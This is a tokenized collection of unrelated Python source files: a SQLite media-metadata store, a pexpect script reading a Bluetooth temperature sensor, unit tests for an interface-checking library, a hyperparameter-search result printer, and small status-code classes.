SERIES_COLUMNS , EPISODE_COLUMNS , ) <EOL> c . execute ( sql , ( series_id , season_number , episode_number ) ) <EOL> results = c . fetchall ( ) <EOL> if len ( results ) == <NUM_LIT:1> : <EOL> to_return = self . create_episode_from_row ( results [ <NUM_LIT:0> ] ) <EOL> return to_return <EOL> else : <EOL> return None <EOL> finally : <EOL> c . close ( ) <EOL> def get_episode_by_date ( self , series_id , year , month , day ) : <EOL> the_date = datetime ( year , month , day ) <EOL> the_date_str = the_date . strftime ( ORIGINAL_AIR_DATE_FORMAT ) <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( SERIES_COLUMNS , EPISODE_COLUMNS , ) <EOL> c . execute ( sql , ( series_id , the_date_str ) ) <EOL> results = c . fetchall ( ) <EOL> if len ( results ) == <NUM_LIT:1> : <EOL> to_return = self . create_episode_from_row ( results [ <NUM_LIT:0> ] ) <EOL> return to_return <EOL> else : <EOL> return None <EOL> finally : <EOL> c . close ( ) <EOL> def get_movie ( self , id ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( MOVIE_COLUMNS , ) <EOL> c . execute ( sql , ( id , ) ) <EOL> results = c . fetchall ( ) <EOL> if len ( results ) == <NUM_LIT:1> : <EOL> r = results [ <NUM_LIT:0> ] <EOL> to_return = self . create_movie_from_row ( r ) <EOL> return to_return <EOL> else : <EOL> return None <EOL> finally : <EOL> c . close ( ) <EOL> def get_all_movies ( self ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( MOVIE_COLUMNS , ) <EOL> c . execute ( sql ) <EOL> to_return = [ ] <EOL> results = c . fetchall ( ) <EOL> for r in results : <EOL> to_return . append ( self . create_movie_from_row ( r ) ) <EOL> return to_return <EOL> finally : <EOL> c . close ( ) <EOL> def add_movie ( self , movie ) : <EOL> existing_movie = self . get_movie ( movie . id ) <EOL> if existing_movie is None : <EOL> if self . debug : <EOL> print "<STR_LIT>" % ( movie . title , ) <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> c . execute ( <EOL> '<STR_LIT>' , <EOL> ( movie . id , movie . title , movie . description , movie . time , movie . rating , '<STR_LIT:|>' . join ( movie . directors ) , '<STR_LIT:|>' . join ( movie . writers ) , '<STR_LIT:|>' . join ( movie . producers ) , '<STR_LIT:|>' . join ( movie . actors ) , movie . movie_year , movie . mpaa_rating , '<STR_LIT:|>' . join ( movie . genres ) ) ) <EOL> self . connection . commit ( ) <EOL> finally : <EOL> c . close ( ) <EOL> def clear_movie ( self , movie_id ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' <EOL> c . execute ( sql , ( movie_id , ) ) <EOL> self . connection . commit ( ) <EOL> finally : <EOL> c . close ( ) <EOL> def create_series_from_row ( self , row ) : <EOL> to_return = metadata . Series ( ) <EOL> to_return . id = row [ <NUM_LIT:0> ] <EOL> to_return . zap2it_id = row [ <NUM_LIT:1> ] <EOL> to_return . imdb_id = row [ <NUM_LIT:2> ] <EOL> to_return . title = row [ <NUM_LIT:3> ] <EOL> to_return . description = row [ <NUM_LIT:4> ] <EOL> to_return . actors = row [ <NUM_LIT:5> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . genres = row [ <NUM_LIT:6> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . content_rating = row [ <NUM_LIT:7> ] <EOL> if row [ <NUM_LIT:8> ] == <NUM_LIT:1> : <EOL> to_return . watch = True <EOL> else : <EOL> to_return . watch = False <EOL> return to_return <EOL> def create_episode_from_row ( self , row ) : <EOL> to_return = metadata . Episode ( ) <EOL> to_return . series = self . create_series_from_row ( row ) <EOL> to_return . db_id = row [ <NUM_LIT:9> ] <EOL> to_return . title = row [ <NUM_LIT:10> ] <EOL> to_return . description = row [ <NUM_LIT:11> ] <EOL> to_return . season_number = row [ <NUM_LIT:12> ] <EOL> to_return . episode_number = row [ <NUM_LIT> ] <EOL> if not row [ <NUM_LIT> ] . strip ( ) == '<STR_LIT>' : <EOL> to_return . original_air_date = self . get_datetime_from_string ( row [ <NUM_LIT> ] , ORIGINAL_AIR_DATE_FORMAT ) <EOL> else : <EOL> to_return . original_air_date = None <EOL> to_return . rating = row [ <NUM_LIT:15> ] <EOL> to_return . directors = row [ <NUM_LIT:16> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . host = row [ <NUM_LIT> ] <EOL> to_return . choreographer = row [ <NUM_LIT> ] <EOL> to_return . guest_stars = row [ <NUM_LIT> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . writers = row [ <NUM_LIT:20> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . executive_producers = row [ <NUM_LIT> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . producers = row [ <NUM_LIT> ] . split ( '<STR_LIT:|>' ) <EOL> return to_return <EOL> def create_movie_from_row ( self , row ) : <EOL> to_return = metadata . Movie ( ) <EOL> to_return . db_id = row [ <NUM_LIT:0> ] <EOL> to_return . id = row [ <NUM_LIT:1> ] <EOL> to_return . title = row [ <NUM_LIT:2> ] <EOL> to_return . description = row [ <NUM_LIT:3> ] <EOL> if not row [ <NUM_LIT:4> ] . strip ( ) == '<STR_LIT>' : <EOL> to_return . time = self . get_datetime_from_string ( row [ <NUM_LIT:4> ] , TIME_FORMAT ) <EOL> else : <EOL> to_return . time = None <EOL> to_return . rating = row [ <NUM_LIT:5> ] <EOL> to_return . directors = row [ <NUM_LIT:6> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . writers = row [ <NUM_LIT:7> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . producers = row [ <NUM_LIT:8> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . actors = row [ <NUM_LIT:9> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . movie_year = row [ <NUM_LIT:10> ] <EOL> to_return . mpaa_rating = row [ <NUM_LIT:11> ] <EOL> to_return . genres = row [ <NUM_LIT:12> ] . split ( '<STR_LIT:|>' ) <EOL> return to_return <EOL> def get_datetime_from_string ( self , input_str , format ) : <EOL> if input_str is None or input_str == '<STR_LIT>' : <EOL> return None <EOL> else : <EOL> return datetime . strptime ( input_str , format ) </s>
<s> import pexpect <EOL> import sys <EOL> import time <EOL> def floatfromhex ( h ) : <EOL> t = float . fromhex ( h ) <EOL> if t > float . fromhex ( '<STR_LIT>' ) : <EOL> t = - ( float . fromhex ( '<STR_LIT>' ) - t ) <EOL> pass <EOL> return t <EOL> def calcTmpTarget ( objT , ambT ) : <EOL> m_tmpAmb = ambT / <NUM_LIT> <EOL> Vobj2 = objT * <NUM_LIT> <EOL> Tdie2 = m_tmpAmb + <NUM_LIT> <EOL> S0 = <NUM_LIT> <EOL> a1 = <NUM_LIT> <EOL> a2 = - <NUM_LIT> <EOL> b0 = - <NUM_LIT> <EOL> b1 = - <NUM_LIT> <EOL> b2 = <NUM_LIT> <EOL> c2 = <NUM_LIT> <EOL> Tref = <NUM_LIT> <EOL> S = S0 * ( <NUM_LIT:1> + a1 * ( Tdie2 - Tref ) + a2 * pow ( ( Tdie2 - Tref ) , <NUM_LIT:2> ) ) <EOL> Vos = b0 + b1 * ( Tdie2 - Tref ) + b2 * pow ( ( Tdie2 - Tref ) , <NUM_LIT:2> ) <EOL> fObj = ( Vobj2 - Vos ) + c2 * pow ( ( Vobj2 - Vos ) , <NUM_LIT:2> ) <EOL> tObj = pow ( pow ( Tdie2 , <NUM_LIT:4> ) + ( fObj / S ) , <NUM_LIT> ) <EOL> tObj = ( tObj - <NUM_LIT> ) <EOL> print "<STR_LIT>" % tObj <EOL> bluetooth_adr = sys . argv [ <NUM_LIT:1> ] <EOL> tool = pexpect . spawn ( '<STR_LIT>' + bluetooth_adr + '<STR_LIT>' ) <EOL> tool . expect ( '<STR_LIT>' ) <EOL> print "<STR_LIT>" <EOL> tool . sendline ( '<STR_LIT>' ) <EOL> tool . expect ( '<STR_LIT>' ) <EOL> tool . sendline ( '<STR_LIT>' ) <EOL> tool . expect ( '<STR_LIT>' ) <EOL> while True : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> tool . sendline ( '<STR_LIT>' ) <EOL> tool . expect ( '<STR_LIT>' ) <EOL> rval = tool . after . split ( ) <EOL> objT = floatfromhex ( rval [ <NUM_LIT:2> ] + rval [ <NUM_LIT:1> ] ) <EOL> ambT = floatfromhex ( rval [ <NUM_LIT:4> ] + rval [ <NUM_LIT:3> ] ) <EOL> calcTmpTarget ( objT , ambT ) </s>
<s> import inspect <EOL> import unittest <EOL> import six <EOL> from wiring . interface import ( <EOL> Attribute , <EOL> Interface , <EOL> InterfaceComplianceError , <EOL> Method , <EOL> MethodValidationError , <EOL> MissingAttributeError , <EOL> get_implemented_interfaces , <EOL> implements , <EOL> implements_only , <EOL> isimplementation <EOL> ) <EOL> from . import ModuleTest <EOL> class InterfaceModuleTest ( ModuleTest ) : <EOL> module = '<STR_LIT>' <EOL> class AttributeTest ( unittest . TestCase ) : <EOL> def test_construction ( self ) : <EOL> attribute = Attribute ( ) <EOL> self . assertIsNone ( attribute . docstring ) <EOL> attribute = Attribute ( docstring = "<STR_LIT>" ) <EOL> self . assertEqual ( attribute . docstring , "<STR_LIT>" ) <EOL> def test_repr ( self ) : <EOL> attribute = Attribute ( ) <EOL> self . assertEqual ( repr ( attribute ) , '<STR_LIT>' ) <EOL> attribute = Attribute ( docstring = "<STR_LIT>" ) <EOL> self . assertEqual ( repr ( attribute ) , '<STR_LIT>' ) <EOL> class MethodTest ( unittest . TestCase ) : <EOL> def _example_method_definition ( foo , bar = <NUM_LIT:12> ) : <EOL> """<STR_LIT>""" <EOL> def _example_method_implementation ( self , foo , bar = <NUM_LIT:12> ) : <EOL> pass <EOL> @ classmethod <EOL> def _example_method_classmethod ( cls , foo , bar = <NUM_LIT:12> ) : <EOL> pass <EOL> @ staticmethod <EOL> def _example_method_static ( foo , bar = <NUM_LIT:12> ) : <EOL> pass <EOL> def _get_argspec ( self , function ) : <EOL> if six . PY3 : <EOL> return inspect . getfullargspec ( function ) <EOL> else : <EOL> return inspect . getargspec ( function ) <EOL> def test_construction ( self ) : <EOL> argspec = self . _get_argspec ( self . _example_method_definition ) <EOL> method = Method ( argspec ) <EOL> self . assertEqual ( method . argument_specification , argspec ) <EOL> self . assertIsNone ( method . docstring ) <EOL> method = Method ( argspec , docstring = "<STR_LIT>" ) <EOL> self . assertEqual ( method . argument_specification , argspec ) <EOL> self . assertEqual ( method . docstring , "<STR_LIT>" ) <EOL> def test_repr ( self ) : <EOL> argspec = self . _get_argspec ( self . _example_method_definition ) <EOL> method = Method ( argspec ) <EOL> self . assertEqual ( repr ( method ) , '<STR_LIT>' ) <EOL> method = Method ( argspec , docstring = "<STR_LIT>" ) <EOL> self . assertEqual ( repr ( method ) , '<STR_LIT>' ) <EOL> def test_check_compliance ( self ) : <EOL> argspec = self . _get_argspec ( self . _example_method_definition ) <EOL> method = Method ( argspec ) <EOL> method . check_compliance ( self . _example_method_implementation ) <EOL> method . check_compliance ( self . _example_method_classmethod ) <EOL> method . check_compliance ( self . _example_method_static ) <EOL> def other_implementation ( foo , bar = <NUM_LIT:12> ) : <EOL> pass <EOL> method . check_compliance ( other_implementation ) <EOL> def invalid_implementation ( foo , bar = <NUM_LIT> ) : <EOL> pass <EOL> with self . assertRaises ( MethodValidationError ) as cm : <EOL> method . check_compliance ( invalid_implementation ) <EOL> self . assertEquals ( <EOL> cm . exception . expected_argspec , <EOL> argspec <EOL> ) <EOL> self . assertEquals ( <EOL> cm . exception . observed_argspec , <EOL> self . _get_argspec ( invalid_implementation ) <EOL> ) <EOL> self . assertEquals ( <EOL> str ( cm . exception ) , <EOL> ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> ) <EOL> class InterfaceTest ( unittest . TestCase ) : <EOL> def assertAttributes ( self , interface , attributes ) : <EOL> self . assertSetEqual ( <EOL> frozenset ( six . iterkeys ( interface . attributes ) ) , <EOL> frozenset ( attributes ) <EOL> ) <EOL> def test_elements ( self ) : <EOL> class IPerson ( Interface ) : <EOL> first_name = Attribute ( """<STR_LIT>""" ) <EOL> last_name = """<STR_LIT>""" <EOL> age = <NUM_LIT> <EOL> def get_full_name ( ) : <EOL> """<STR_LIT>""" <EOL> def add_friend ( friend , close = False ) : <EOL> pass <EOL> self . assertAttributes ( <EOL> IPerson , <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> first_name = IPerson . attributes [ '<STR_LIT>' ] <EOL> self . assertIsInstance ( first_name , Attribute ) <EOL> self . assertEqual ( first_name . docstring , "<STR_LIT>" ) <EOL> last_name = IPerson . attributes [ '<STR_LIT>' ] <EOL> self . assertIsInstance ( last_name , Attribute ) <EOL> self . assertEqual ( last_name . docstring , "<STR_LIT>" ) <EOL> age = IPerson . attributes [ '<STR_LIT>' ] <EOL> self . assertIsInstance ( age , Attribute ) <EOL> self . assertIsNone ( age . docstring ) <EOL> get_full_name = IPerson . attributes [ '<STR_LIT>' ] <EOL> self . assertIsInstance ( get_full_name , Method ) <EOL> self . assertEqual ( <EOL> get_full_name . docstring , <EOL> "<STR_LIT>" <EOL> ) <EOL> if six . PY3 : <EOL> self . assertEqual ( <EOL> get_full_name . argument_specification , <EOL> inspect . FullArgSpec ( <EOL> args = [ ] , <EOL> varargs = None , <EOL> varkw = None , <EOL> defaults = None , <EOL> kwonlyargs = [ ] , <EOL> kwonlydefaults = None , <EOL> annotations = { } <EOL> ) <EOL> ) <EOL> else : <EOL> self . assertEqual ( <EOL> get_full_name . argument_specification , <EOL> inspect . ArgSpec ( <EOL> args = [ ] , <EOL> varargs = None , <EOL> keywords = None , <EOL> defaults = None <EOL> ) <EOL> ) <EOL> add_friend = IPerson . attributes [ '<STR_LIT>' ] <EOL> self . assertIsInstance ( add_friend , Method ) <EOL> self . assertIsNone ( add_friend . docstring ) <EOL> if six . PY3 : <EOL> self . assertEqual ( <EOL> add_friend . argument_specification , <EOL> inspect . FullArgSpec ( <EOL> args = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> varargs = None , <EOL> varkw = None , <EOL> defaults = ( False , ) , <EOL> kwonlyargs = [ ] , <EOL> kwonlydefaults = None , <EOL> annotations = { } <EOL> ) <EOL> ) <EOL> else : <EOL> self . assertEqual ( <EOL> add_friend . argument_specification , <EOL> inspect . ArgSpec ( <EOL> args = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> varargs = None , <EOL> keywords = None , <EOL> defaults = ( False , ) <EOL> ) <EOL> ) <EOL> def test_inheritance ( self ) : <EOL> class IEntity ( Interface ) : <EOL> id = Attribute ( """<STR_LIT>""" ) <EOL> class IItem ( IEntity ) : <EOL> name = Attribute ( """<STR_LIT>""" ) <EOL> class ICreature ( IEntity ) : <EOL> name = Attribute ( """<STR_LIT>""" ) <EOL> def give ( item ) : <EOL> pass <EOL> class ISprite ( Interface ) : <EOL> name = Attribute ( """<STR_LIT>""" ) <EOL> def get_frame ( time ) : <EOL> pass <EOL> class IPlayer ( ICreature , ISprite ) : <EOL> email = Attribute ( """<STR_LIT>""" ) <EOL> def login ( ) : <EOL> pass <EOL> self . assertAttributes ( <EOL> IEntity , <EOL> [ '<STR_LIT:id>' ] <EOL> ) <EOL> self . assertAttributes ( <EOL> IItem , <EOL> [ '<STR_LIT:id>' , '<STR_LIT:name>' ] <EOL> ) <EOL> self . assertEqual ( <EOL> IItem . attributes [ '<STR_LIT:name>' ] . docstring , <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assertAttributes ( <EOL> ICreature , <EOL> [ <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT:name>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> self . assertEqual ( <EOL> ICreature . attributes [ '<STR_LIT:name>' ] . docstring , <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assertAttributes ( <EOL> ISprite , <EOL> [ <EOL> '<STR_LIT:name>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> self . assertAttributes ( <EOL> IPlayer , <EOL> [ <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT:name>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:email>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> def test_check_compliance ( self ) : <EOL> class IPerson ( Interface ) : <EOL> first_name = """<STR_LIT>""" <EOL> last_name = """<STR_LIT>""" <EOL> def get_full_name ( ) : <EOL> """<STR_LIT>""" <EOL> class ValidPerson ( object ) : <EOL> def __init__ ( self ) : <EOL> self . first_name = "<STR_LIT>" <EOL> self . last_name = "<STR_LIT>" <EOL> def get_full_name ( self ) : <EOL> return '<STR_LIT:U+0020>' . join ( ( self . first_name , self . last_name ) ) <EOL> class MissingAttributePerson ( object ) : <EOL> def __init__ ( self ) : <EOL> self . last_name = "<STR_LIT>" <EOL> def get_full_name ( self ) : <EOL> return self . last_name <EOL> class BadMethodPerson ( object ) : <EOL> def __init__ ( self ) : <EOL> self . first_name = "<STR_LIT>" <EOL> self . last_name = "<STR_LIT>" <EOL> def get_full_name ( self , foobar ) : <EOL> return '<STR_LIT:U+0020>' . join ( ( self . first_name , self . last_name ) ) <EOL> with self . assertRaises ( TypeError ) : <EOL> IPerson . check_compliance ( ValidPerson ) <EOL> IPerson . check_compliance ( ValidPerson ( ) ) <EOL> with self . assertRaises ( MissingAttributeError ) as cm : <EOL> IPerson . check_compliance ( MissingAttributePerson ( ) ) <EOL> self . assertIsInstance ( cm . exception , InterfaceComplianceError ) <EOL> self . assertEquals ( cm . exception . attribute_name , '<STR_LIT>' ) <EOL> self . assertEquals ( <EOL> str ( cm . exception ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> bad_method_person = BadMethodPerson ( ) <EOL> with self . assertRaises ( MethodValidationError ) as cm : <EOL> IPerson . check_compliance ( bad_method_person ) <EOL> self . assertIsInstance ( cm . exception , InterfaceComplianceError ) <EOL> self . assertEquals ( <EOL> cm . exception . function , <EOL> bad_method_person . get_full_name <EOL> ) <EOL> def test_check_compliance_inheritance ( self ) : <EOL> class IEntity ( Interface ) : <EOL> id = """<STR_LIT>""" <EOL> class ICommon ( Interface ) : <EOL> added = """<STR_LIT>""" <EOL> class IPerson ( IEntity , ICommon ) : <EOL> name = """<STR_LIT>""" <EOL> class IManager ( IPerson ) : <EOL> annoying = """<STR_LIT>""" <EOL> self . assertTupleEqual ( <EOL> IEntity . implied , <EOL> ( IEntity , ) <EOL> ) <EOL> self . assertTupleEqual ( <EOL> ICommon . implied , <EOL> ( ICommon , ) <EOL> ) <EOL> self . assertTupleEqual ( <EOL> IPerson . implied , <EOL> ( IPerson , IEntity , ICommon , ) <EOL> ) <EOL> self . assertTupleEqual ( <EOL> IManager . implied , <EOL> ( IManager , IPerson , IEntity , ICommon , ) <EOL> ) <EOL> self . assertAttributes ( <EOL> IEntity , <EOL> [ '<STR_LIT:id>' ] <EOL> ) <EOL> self . assertAttributes ( <EOL> ICommon , <EOL> [ '<STR_LIT>' ] <EOL> ) <EOL> self . assertAttributes ( <EOL> IPerson , <EOL> [ <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:name>' , <EOL> ] <EOL> ) <EOL> self . assertAttributes ( <EOL> IManager , <EOL> [ <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:name>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> class InvalidManager1 ( object ) : <EOL> def __init__ ( self ) : <EOL> self . annoying = True <EOL> with self . assertRaises ( MissingAttributeError ) as cm : <EOL> IManager . check_compliance ( InvalidManager1 ( ) ) <EOL> class InvalidManager2 ( object ) : <EOL> def __init__ ( self ) : <EOL> self . name = "<STR_LIT>" <EOL> self . added = None <EOL> self . annoying = True <EOL> with self . assertRaises ( MissingAttributeError ) as cm : <EOL> IManager . check_compliance ( InvalidManager2 ( ) ) <EOL> self . assertEqual ( cm . exception . attribute_name , '<STR_LIT:id>' ) <EOL> class ValidManager ( object ) : <EOL> def __init__ ( self ) : <EOL> self . id = <NUM_LIT:1> <EOL> self . added = None <EOL> self . annoying = True <EOL> self . name = "<STR_LIT>" <EOL> IManager . check_compliance ( ValidManager ( ) ) <EOL> def test_docstring ( self ) : <EOL> class IObject ( Interface ) : <EOL> """<STR_LIT>""" <EOL> self . assertAttributes ( <EOL> IObject , <EOL> [ ] <EOL> ) <EOL> self . assertEqual ( IObject . __doc__ , "<STR_LIT>" ) <EOL> class DeclarationTest ( unittest . TestCase ) : <EOL> def assertIsImplementation ( self , obj , interfaces ) : <EOL> self . assertTrue ( isimplementation ( obj , interfaces ) ) <EOL> def assertNotIsImplementation ( self , obj , interfaces ) : <EOL> self . assertFalse ( isimplementation ( obj , interfaces ) ) <EOL> def test_implements ( self ) : <EOL> class ICreature ( Interface ) : <EOL> age = """<STR_LIT>""" <EOL> class IPerson ( ICreature ) : <EOL> first_name = Attribute ( """<STR_LIT>""" ) <EOL> last_name = Attribute ( """<STR_LIT>""" ) <EOL> def get_full_name ( ) : <EOL> """<STR_LIT>""" <EOL> class IObject ( Interface ) : <EOL> id = """<STR_LIT>""" <EOL> class IDuck ( Interface ) : <EOL> def quack ( ) : <EOL> pass <EOL> class IEmployee ( Interface ) : <EOL> salary = """<STR_LIT>""" <EOL> @ implements ( IPerson , IObject ) <EOL> class Person ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . id = <NUM_LIT:1> <EOL> self . first_name = '<STR_LIT>' <EOL> self . last_name = '<STR_LIT>' <EOL> def get_full_name ( self ) : <EOL> return '<STR_LIT>' . format ( self . first_name , self . last_name ) <EOL> @ implements ( IEmployee ) <EOL> class Employee ( Person ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( Person . __name__ , '<STR_LIT>' ) <EOL> self . assertEqual ( inspect . getdoc ( Person ) , "<STR_LIT>" ) <EOL> self . assertEqual ( Employee . __name__ , '<STR_LIT>' ) <EOL> self . assertEqual ( inspect . getdoc ( Employee ) , "<STR_LIT>" ) <EOL> for cls in ( Person , Employee , ) : <EOL> self . assertIsImplementation ( cls , [ ] ) <EOL> self . assertIsImplementation ( cls , ICreature ) <EOL> self . assertIsImplementation ( cls , IPerson ) <EOL> self . assertIsImplementation ( cls , IObject ) <EOL> self . assertIsImplementation ( cls , [ IPerson ] ) <EOL> self . assertIsImplementation ( cls , [ IObject ] ) <EOL> self . assertIsImplementation ( cls , [ IObject , IPerson ] ) <EOL> self . assertIsImplementation ( cls , [ ICreature , IObject , IPerson ] ) <EOL> self . assertNotIsImplementation ( cls , IDuck ) <EOL> self . assertNotIsImplementation ( cls , [ IPerson , IDuck ] ) <EOL> self . assertNotIsImplementation ( cls , [ IDuck , IObject ] ) <EOL> self . assertNotIsImplementation ( cls , [ IObject , IPerson , IDuck ] ) <EOL> self . assertIsImplementation ( Employee , IEmployee ) <EOL> self . assertNotIsImplementation ( Person , IEmployee ) <EOL> for obj in ( Person ( ) , Employee ( ) , ) : <EOL> self . assertIsImplementation ( obj , [ ] ) <EOL> self . assertIsImplementation ( obj , ICreature ) <EOL> self . assertIsImplementation ( obj , IPerson ) <EOL> self . assertIsImplementation ( obj , IObject ) <EOL> self . assertIsImplementation ( obj , [ IPerson ] ) <EOL> self . assertIsImplementation ( obj , [ IObject ] ) <EOL> self . assertIsImplementation ( obj , [ IObject , IPerson ] ) <EOL> self . assertIsImplementation ( obj , [ ICreature , IObject , IPerson ] ) <EOL> self . assertNotIsImplementation ( obj , IDuck ) <EOL> self . assertNotIsImplementation ( obj , [ IPerson , IDuck ] ) <EOL> self . assertNotIsImplementation ( obj , [ IDuck , IObject ] ) <EOL> self . assertNotIsImplementation ( obj , [ IObject , IPerson , IDuck ] ) <EOL> self . assertIsImplementation ( Employee ( ) , IEmployee ) <EOL> self . assertNotIsImplementation ( Person ( ) , IEmployee ) <EOL> def test_implements_only ( self ) : <EOL> class ICreature ( Interface ) : <EOL> age = """<STR_LIT>""" <EOL> class IPerson ( ICreature ) : <EOL> first_name = Attribute ( """<STR_LIT>""" ) <EOL> last_name = Attribute ( """<STR_LIT>""" ) <EOL> def get_full_name ( ) : <EOL> """<STR_LIT>""" <EOL> class IObject ( Interface ) : <EOL> id = """<STR_LIT>""" <EOL> class IDuck ( Interface ) : <EOL> def quack ( ) : <EOL> pass <EOL> @ implements ( IPerson , IObject ) <EOL> class Person ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . id = <NUM_LIT:1> <EOL> self . first_name = '<STR_LIT>' <EOL> self . last_name = '<STR_LIT>' <EOL> def get_full_name ( self ) : <EOL> return '<STR_LIT>' . format ( self . first_name , self . last_name ) <EOL> @ implements_only ( IDuck ) <EOL> class Duck ( Person ) : <EOL> """<STR_LIT>""" <EOL> def quack ( self ) : <EOL> pass <EOL> self . assertSetEqual ( <EOL> get_implemented_interfaces ( Duck ) , <EOL> set ( [ IDuck ] ) <EOL> ) <EOL> self . assertSetEqual ( <EOL> get_implemented_interfaces ( Person ) , <EOL> set ( [ ICreature , IPerson , IObject ] ) <EOL> ) <EOL> self . assertEqual ( Duck . __name__ , '<STR_LIT>' ) <EOL> self . assertEqual ( inspect . getdoc ( Duck ) , "<STR_LIT>" ) <EOL> self . assertIsImplementation ( Duck , [ ] ) <EOL> self . assertIsImplementation ( Duck , IDuck ) <EOL> self . assertIsImplementation ( Duck , [ IDuck ] ) <EOL> self . assertNotIsImplementation ( Duck , IPerson ) <EOL> self . assertNotIsImplementation ( Duck , IObject ) <EOL> self . assertNotIsImplementation ( Duck , [ IPerson , IDuck ] ) <EOL> self . assertNotIsImplementation ( Duck , [ IDuck , IObject , IPerson ] ) <EOL> duck = Duck ( ) <EOL> self . assertIsImplementation ( duck , [ ] ) <EOL> self . assertIsImplementation ( duck , IDuck ) <EOL> self . assertIsImplementation ( duck , [ IDuck ] ) <EOL> self . assertNotIsImplementation ( duck , IPerson ) <EOL> self . assertNotIsImplementation ( duck , IObject ) <EOL> self . assertNotIsImplementation ( duck , [ IPerson , IDuck ] ) <EOL> self . assertNotIsImplementation ( duck , [ IDuck , IObject , IPerson ] ) </s>
<s> from __future__ import print_function <EOL> import numpy as np <EOL> from . config import Config <EOL> from . trials import Trial <EOL> from sklearn . pipeline import Pipeline <EOL> def execute ( args , parser ) : <EOL> config = Config ( args . config , verbose = False ) <EOL> session = config . trials ( ) <EOL> items = [ curr . to_dict ( ) for curr in session . query ( Trial ) . all ( ) ] <EOL> if not items : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> c_b_m = items [ np . argmax ( [ i [ "<STR_LIT>" ] for i in items ] ) ] <EOL> parameter_dict = c_b_m [ "<STR_LIT>" ] <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' % ( c_b_m [ "<STR_LIT>" ] , <EOL> np . std ( c_b_m [ "<STR_LIT>" ] ) ) ) <EOL> print ( '<STR_LIT>' ) <EOL> if isinstance ( config . estimator ( ) , Pipeline ) : <EOL> print ( '<STR_LIT>' ) <EOL> for i in config . estimator ( ) . steps : <EOL> print ( i [ <NUM_LIT:0> ] ) <EOL> for param in sorted ( parameter_dict . keys ( ) ) : <EOL> if str ( param ) . startswith ( i [ <NUM_LIT:0> ] ) : <EOL> print ( "<STR_LIT>" , param . split ( "<STR_LIT>" ) [ <NUM_LIT:1> ] , "<STR_LIT:\t>" , <EOL> parameter_dict [ param ] ) <EOL> else : <EOL> print ( config . estimator ( ) ) <EOL> search_space = config . search_space ( ) . variables . keys ( ) <EOL> for param in sorted ( parameter_dict . keys ( ) ) : <EOL> if param in search_space : <EOL> print ( "<STR_LIT>" , param , "<STR_LIT:\t>" , parameter_dict [ param ] ) <EOL> return </s>
<s> class ExprStatus : <EOL> Init = <NUM_LIT:0> <EOL> Starting = <NUM_LIT:1> <EOL> Running = <NUM_LIT:2> <EOL> Stopped = <NUM_LIT:3> <EOL> Deleted = <NUM_LIT:4> <EOL> Failed = <NUM_LIT:5> <EOL> Rollbacking = <NUM_LIT:6> <EOL> Rollbacked = <NUM_LIT:7> <EOL> class VirtualEnvStatus : <EOL> Init = <NUM_LIT:0> <EOL> Running = <NUM_LIT:1> <EOL> Stopped = <NUM_LIT:2> <EOL> Deleted = <NUM_LIT:3> <EOL> class PortBindingType : <EOL> CloudService = <NUM_LIT:1> <EOL> Docker = <NUM_LIT:2> <EOL> class VirtualEnvironmentProvider : <EOL> AzureVM = "<STR_LIT>" <EOL> Docker = "<STR_LIT>" <EOL> class RemoteProvider : <EOL> Guacamole = "<STR_LIT>" <EOL> class EmailStatus : <EOL> Primary = <NUM_LIT:1> <EOL> NonPrimary = <NUM_LIT:0> <EOL> class LoginProvider : <EOL> live = <NUM_LIT:1> <EOL> github = <NUM_LIT:2> <EOL> qq = <NUM_LIT:4> <EOL> weibo = <NUM_LIT:8> <EOL> alauda = <NUM_LIT:32> <EOL> wechat = <NUM_LIT:64> </s>
